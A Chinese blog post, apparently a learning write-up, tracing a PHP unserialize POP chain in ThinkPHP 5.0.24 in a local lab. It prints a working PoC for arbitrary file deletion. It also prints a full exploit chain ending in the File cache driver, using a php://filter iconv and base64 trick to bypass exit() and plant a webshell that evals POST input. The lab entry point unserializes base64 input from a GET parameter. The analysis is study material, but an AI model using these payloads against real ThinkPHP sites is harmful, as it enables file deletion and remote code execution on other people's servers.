Thinkphp5.0.24 pop链子学习

最新推荐文章于 2024-05-02 20:40:27 发布
最新推荐文章于 2024-05-02 20:40:27 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: thinkphp代码审计 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/127416166
版权

目录

前言:

任意删除文件

poc

恶意文件上传

 三处存在__call漏洞可能

绕过getRelationData方法中的三个条件

调用__call之后的操作

利用php为协议来绕过exit();?>

poc

前言:

下载地址:下载:ThinkPHP5.0.24核心版 - ThinkPHP框架

利用的phpstudy+PhpStorm搭建的debug环境。

首先在app\index\controller下的index.php设置一个传入点。

index.php

<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        echo 'welcome to tp5024';
        if(isset($_GET['feng'])){
            $feng = base64_decode($_GET['feng']);
            unserialize($feng);
        }
    }
}

一开始接触,感觉最好找一个链子,debug一下,一步一步跟,不然直接自己找的话会看的头疼。

任意删除文件

在Windows.php的__destruct中。

 跟进一下removeFiles。

private function removeFiles()
    {
        foreach ($this->files as $filename) {
            if (file_exists($filename)) {
                @unlink($filename);
            }
        }
        $this->files = [];
    }

 大概意思是对files遍历,将file赋值给filename,跟一下file。

发现file可控,然后看一下file在哪个类里。

发现Windows继承了 Pipes。

poc

<?php

namespace think\process\pipes;

class Pipes{}

class Windows extends Pipes
{
    private $files = ['D:\phpstudy_pro\WWW\tp5024\1.txt'];
}

echo base64_encode(serialize(new Windows()));

下个断点,很容易看清其走向。

 

 

 然后便会发现1.txt已经被删除。

恶意文件上传

file_exists搭配对象可以跳到__toString。

 在Model.php的__toString中,进入tojson然后跟进,到toArray()。

    public function __toString()
    {
        return $this->toJson();
    }

    public function toJson($options = JSON_UNESCAPED_UNICODE)
    {
        return json_encode($this->toArray(), $options);
    }

 三处存在__call漏洞可能

$item[$key] = $relation->append([$attr])->toArray();
$bindAttr = $modelRelation->getBindAttr();
$item[$key] = $value ? $value->getAttr($attr) : null;

找一下可控变量,$value可控,往上边跟一下。

$value = $this->getRelationData($modelRelation);

$value是在getRelationData中返还,跟进看一下。

$value = $this->parent;

看一下parent是否可控,发现可控,看一下if条件。

三个条件:

$this->parent
!$modelRelation->isSelfRelation()
get_class($modelRelation->getModel()) == get_class($this->parent)

第一个:parent可控。

第二个:

 可控

第三个:跟进getModel函数

 query可控,然后又调用了getModel,再跟进,在thinkphp\library\think\db\Query.php中发现getModel方法。

 返还model,参数可控。

绕过getRelationData方法中的三个条件

三个条件都可以满足,可以进入if条件。

再看下边代码中的$modelRelation参数。

$value = $this->getRelationData($modelRelation);

$modelRelation被relation控制,relation被Loader::parseName控制,跟一下。

发现其只是一个大小写变化,不会改变name参数,因为$name可控,所以$relation可控。

if (method_exists($this, $relation)) {
               $modelRelation = $this->$relation();
               $value         = $this->getRelationData($modelRelation);

想进入if语句,需要满足这个method_exists,则需要将$relation设定为$this中存在的方法,relation可以控制,this指的是Model这个类,看一起其中哪一个方法返回参数可以直接控制。

发现了getError方法,且返回的error参数可以直接控制。

error参数的值刚好直接可以返还给$modelRelation。

$modelRelation = $this->$relation();

这里的relation()可以直接当作getError(),返还error的值,所以$modelRelation=$error

想进入改语句,需要先解决前边几个if条件。

if (method_exists($modelRelation, 'getBindAttr'))
$bindAttr = $modelRelation->getBindAttr()
if ($bindAttr)

下边的一个if语句刚好就是modelRelation的getBindAttr方法返回的值,跟一下getBindAttr。

在OneToOne.php发现该方法,并且bindAttr可控,第二个if条件也可以过了。

    public function getBindAttr()
    {
        return $this->bindAttr;
    }

OneToOne是一个抽象类,且OneToOne类是Relation类的派生类,然后找一下谁继承了OneToOne,找到了class HasOne extends OneToOne,HasOne继承了OneToOne。可以直接让让$modelRelation的值为HasOne,可以满足getRelationData方法中if第三个条件的getModel方法,并且其中也有bindAttr可控。

然后进入if (isset($this->data[$key]))的else条件便可以调用__call方法。

调用__call之后的操作

public function __call($method, $args)
    {
        if (in_array($method, $this->styles)) {
            array_unshift($args, $method);
            return call_user_func_array([$this, 'block'], $args);
        }

        if ($this->handle && method_exists($this->handle, $method)) {
            return call_user_func_array([$this->handle, $method], $args);
        } else {
            throw new Exception('method not exists:' . __CLASS__ . '->' . $method);
        }
    }

}

call函数中in_array的$method, $this->styles两个参数可控,可以进入if语句,然后可以实现block方法,跟进一下block。

直接到了write方法,发现handel可控,找一个存在可控write方法的类利用。 

 $this->handler可控,再找一下可以利用的set方法。

在thinkphp\library\think\cache\driver\File.php中发现set且存在一个写入文件的操作。

public function set($name, $value, $expire = null)
    {
        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }
        if ($expire instanceof \DateTime) {
            $expire = $expire->getTimestamp() - time();
        }
        $filename = $this->getCacheKey($name, true);
        if ($this->tag && !is_file($filename)) {
            $first = true;
        }
        $data = serialize($value);
        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }
        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);
        if ($result) {
            isset($first) && $this->setTagItem($filename);
            clearstatcache();
            return true;
        } else {
            return false;
        }
    }

首先看一下filename和data是否可控。

$filename = $this->getCacheKey($name, true);

filename由getCacheKey决定,跟一下getCacheKey。

$filename = $this->options['path'] . $name . '.php';

filename类型后缀为php,前边的options['path']和name可控。

 很明显可以看出$data=$value=$sessData=$newline=ture,所以data不可控,直接这样写入文件行不通,但在后边的setTagItem方法中,再一次调用了set方法。

    protected function setTagItem($name)
    {
        if ($this->tag) {
            $key       = 'tag_' . md5($this->tag);
            $this->tag = null;
            if ($this->has($key)) {
                $value   = explode(',', $this->get($key));
                $value[] = $name;
                $value   = implode(',', array_unique($value));
            } else {
                $value = $name;
            }
            $this->set($key, $value, 0);
        }
    }

此时$key和$value均可控。

利用php为协议来绕过exit();?>

利用php://filter中string.rot13过滤器去除”exit”。string.rot13的特性是编码和解码都是自身完成,利用这一特性可以去除exit。<?php exit;在经过rot13编码后会变成<?cuc rkvg();,前提是PHP不开启short_open_tag。

但这次遇到的和平常的不太一样,本地尝试一下如何才能绕过。

<?php
$filename=$_GET['filename'];
$content1=$_GET['content'];
$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $content1;
file_put_contents($filename,$data);
?>

当我前边加一个a时。

 当加到三个a时,发现成功。

 

 

所以要使用伪协议绕过时,需要前方加入字符来使其可以进行base64解码。

第二次file_put_contents($filename, $data);时的filename和data数据基本一样,所以我又本地试了一下。

<?php
$filename=$_GET['filename'];
$content=$filename;
$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $content;
echo $data;
file_put_contents($filename,$data);
?>

这次需要用到php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgcGhwaW5mbygpOz8+IA==/../1.php,之前的payload无法成功。

php的php://filter/convert.iconv.UTF8.UTF-7这种filter可以用来转换编码,和linux系统中的iconv命令一致,可以用来转xml进行xxe-waf绕过。

成功后便可以开始写exp,我写了好多次才成功。

首先先把进入tostring那一部分写出来。

<?php

namespace think\process\pipes;
abstract class Pipes
{
}

use think\model\Pivot;

class Windows extends Pipes
{
    private $files = [];

    function __construct()
    {
        $this->files = [];
    }
}

给files赋值成对象,tostring在Model中,但Model是一个抽象类,无法直接实例化,找一下Model的继承类,然后回头看一下Model中都需要改哪一些参数。

首先是append的key最后要赋值给$relation,然后还会将relation当作方法利用返回$modelRelation所以要让append = ['getError'],紧接着就是判断$modelRelation中是否有getBindAttr方法。我们做的操作是给getError中返还的error参数赋值成HasOne()对象,让$modelRelation=new HasOne(),因为HasOne继承了抽象类OneToOne,且其中存在可控的getBindAttr方法及参数bindAttr。

然后就到了给$value赋值,value是跳到call的关键点,到getRelationData,让parent=new Output(),Relation抽象类中的$selfRelation=false,此时便可使value等于new Output()。

$bindAttr = $modelRelation->getBindAttr();

 getBindAttr方法是OneToOne中的,返还的是bindAttr,这里给bindAttr赋值=["no","1"],可以绕过if (isset($this->data[$key])),直接进入else,然后再进入Output中的call方法。

对call方法分析,首先是进入第一个if条件,in_array($method, $this->styles)返回真,因为method是从Mode中的$attr直接赋值过来的,所以使method相等in_array即可返回真,$attr是$bindAttr的键值,调试一下。

 发现method为getAttr,所以令$this->styles='getAttr'即可。

后边就是绕过死亡函数,上边已经讲过了,就不再说了。

poc

<?php

namespace think\process\pipes;
abstract class Pipes
{
}

use think\model\Pivot;

class Windows extends Pipes
{
    private $files = [];

    function __construct()
    {
        $this->files = [new Pivot()];
    }
}

namespace think;
use think\model\relation\HasOne;
use think\console\Output;
use think\db\Query;
abstract class Model{
    protected $append = [];
    protected $error;
    public $parent;
    protected $query;
    function __construct()
    {
        $this->append=['getError'];
        $this->error=new HasOne();
        $this->query=new Query();
        $this->parent=new Output();
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model{
}

namespace think\model\relation;
use think\model\Relation;

abstract class OneToOne extends Relation{ # OneToOne抽象类
    function __construct(){
        parent::__construct();
    }
}
// HasOne
class HasOne extends OneToOne{
    protected $bindAttr = [];
    function __construct(){
        parent::__construct();
        $this->bindAttr = ["no","123"];
    }
}
namespace think\model;
use think\db\Query;
abstract class Relation{
    protected $selfRelation;
    protected $query;
    function __construct(){
        $this->selfRelation = false;
        $this->query= new Query();
    }
}
namespace think\db;
use think\console\Output;
class Query{
    protected $model;
    function __construct(){
        $this->model = new Output(); //让其与parent一直,通过getRelationData的第三个条件
    }
}
namespace think\console;
use think\session\driver\Memcache;
class Output{
    private $handle = null;
    protected $styles = [];
    function __construct()
    {
        $this->styles = ['getAttr'];
        $this->handle=new Memcache();
    }

}

namespace think\session\driver;
use think\cache\driver\File;
class Memcache
{
    protected $handler = null;

    function __construct()
    {
        $this->handler = new File();
    }
}
namespace think\cache\driver;
class File
{
    protected $options = [];
    protected $tag;

    function __construct()
    {
        $this->options = [
            'expire' => 0,
            'cache_subdir' => false,
            'prefix' => '',
            'path'=>'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydmZW5nJ10pOz8+IA==/../feng.php',
            'data_compress' => false,
        ];
        $this->tag = true;
    }

    public function Getfilename()
    {
        $name = md5('tag_' . md5($this->tag));
        $filename = $this->options['path'];
        $pos = strpos($filename, "/../");
        $filename = urlencode(substr($filename, $pos + strlen("/../")));
        return $filename . $name . ".php";
    }
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
echo "\n";
$a = new File();
echo $a->Getfilename();

 传参后直接访问文件,文件名就是exp中打印出来的文件名

另一个rce链子因为环境问题一直没复现成功,等之后再加吧。

感觉自己太菜了,就这么一点代码,跟了一整天才搞完。

参考文章:

(7条消息) Thinkphp 5.0.24反序列化漏洞导致RCE分析_浔阳江头夜送客丶的博客-CSDN博客_thinkphp v5.0.24 漏洞

(7条消息) thinkphp5.0.24反序列化链子分析_XiLitter的博客-CSDN博客_thinkphp v5.0.24

f0njl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
bhegi_seg的博客
07-31 917
好了,回到正题,继续跟进到877行,
thinkphp5.0.24反序列化链子分析
m0_62422842的博客
07-19 1400
thinkphp5.0.24框架反序列化的两种链子思路分析
thinkphp5.0.24反序列化漏洞分析
热门推荐
Sk1y的博客
06-22 1万+
thinkphp5.0.24 反序列化漏洞分析 thinkphp5框架:thinkphp5的入口文件在,访问 写一个反序列化入口点全局搜索函数中的函数,调用了removeFiles()跟进removeFiles(),第163行的file_exists可以触发方法全局搜索在的第2265行,发现其调用了跟进,发现其调用了toArray()方法(在Model.php中)跟进,发现其有三处可以调用方法(就是整一个可以控制的类对象,然后让其调用该类不存在的方法,然后触发魔术方法)着重看第三处,...
TP 5.0.24反序列化漏洞分析
goddemon
10-20 5332
很久没发过文章了,最近在研究审计链条相关的东西,codeql,ast,以及一些java的东西很多东西还是没学明白就先不写出来丢人了,写这篇tp的原因呢虽然这个漏洞的分析文章蛮多了,但是还是跟着看了下,一方面是因为以前对pop链挖掘一直学的懵懵懂懂的 ctf的一些pop链能出,但是到了框架里面自己就是挖不出来,所以就想着自己挖下tp反序列化的链子来看看,另一方面是想思考学习下php挖掘利用ast手法去该怎么入手(虽然后面这个问题还没解决),所以就有了这篇文章。
ThinkPHP<5.0.24 Request.php 远程代码执行高危漏洞 修复
qq_40880022的博客
04-10 753
修改文件 thinkphp/library/think/Request.php。ThinkPHP 5.0系列 < 5.0.24。ThinkPHP 5.0系列 5.0.24。ThinkPHP 5.1系列 5.1.31。
ThinkPHP 5.0.24反序列化分析
RestoreJustice的博客
04-12 721
调试环境:phpstudy+phpstorm+xdebugphp版本:php7.3.4nts源码:Thinkphp5.0.24注意:源码下载地址:https://www.thinkphp.cn/donate/download/id/1279.html 三、构建利用点 控制器文件(Controller) ThinkPHP的控制器是一个类,接收用户的输入并调用模型和视图去完成用户的需求,控制器层由核心控制器和业务控制器组成,核心控制器由系统内部的App类完成,负责应用(包括模块、控制器和操作)的调度控制,包
tp5.1 model 获取器中的 visible hidden getRelation简单实用
jim的博客
02-05 2639
$goods_lists = $this->model ->with([ "info" => function ($query) { $query->where(['is_del' => 0]); } ]) ->where($this->model->getCategoryI...
ThinkPHP 5.0.24 核心版
11-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的,ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
thinkPhp5.0.24框架
02-23
thinkPhp5.0.24框架源码分享
ThinkPHP5.0.24完整版
03-14
ThinkPHP5.0.24完整版
thinkphp5.0.24.zip
10-26
thinkphp5.0.24版本 直接解压覆盖对应目录即可
thinkphp5.0.24反序列化
qq_62989306的博客
09-18 1869
此时我们需要寻找能写webshell的__call()方法,在这里选择的是think\console\Output类里的$method是getAttr,且$this->styles是可控的。只要在styles数组里加一个getAttr即可。所以可以顺利进入第一个if。array_unshift() 函数用于向数组插入新元素,新数组的值将被插入到数组的开头。里的参数都是可控的,所以往下走没有影响。call_user_func_array()是回调函数,可以将把一个数组参数作为回调函数的参数。
ThinkPHP对于数据库的关联操作+实例(完美收藏)
AKmumu的专栏
01-11 5025
thinkphp 数据库
thinkphp5 注入 反序列化写文件 phar反序列化
yggcwhat
09-28 2124
thinkphp5框架 注入 反序列化写文件 phar反序列化
thinkphp v5.0.24 密码爆破_实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露
weixin_39913472的博客
11-25 7045
文章来源:NearSec记录一下渗透过程中的思路以及遇到的难点,不足之处还请各位大佬多多包涵。拿到目标站点:http://**.****.cn首先针对目标进行子域名收集发现存在http://t**.****.cn域名,为测试系统URL后面随便输入个目录,发现是ThinkPHP 3.2.3的系统,目前公开渠道没有可直接GetShell的漏洞尝试加上/admin可以进入到后台登录页,使用Burp挂载弱...
php利用阿里云短信SDK实现短信发送功能
最新发布
赛时科技
05-02 1106
在阿里云控制台的AccessKey管理中,创建或查看AccessKey ID和AccessKey Secret,这是用于API调用的身份凭证。用户在前端接收到短信验证码后,需要在你的系统中进行验证。在实际部署之前,确保在测试环境中充分测试你的短信验证码登录功能。首先,你需要有一个阿里云账号,并在阿里云控制台中开通短信服务(Dysmsapi)。你可以使用Composer来安装阿里云短信服务的PHP SDK。在PHP中,你需要编写一个函数来调用阿里云短信服务API发送短信验证码。
thinkphp5.0.24漏洞利用工具
06-28
近期网络上出现了一些ThinkPHP5.0.24漏洞利用工具,攻击者可以利用这些工具进行恶意攻击,比如模拟用户登录、上传恶意文件、获取服务器权限等。而这些攻击都可能严重危害服务器安全,甚至导致数据泄露或丢失。 因此...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值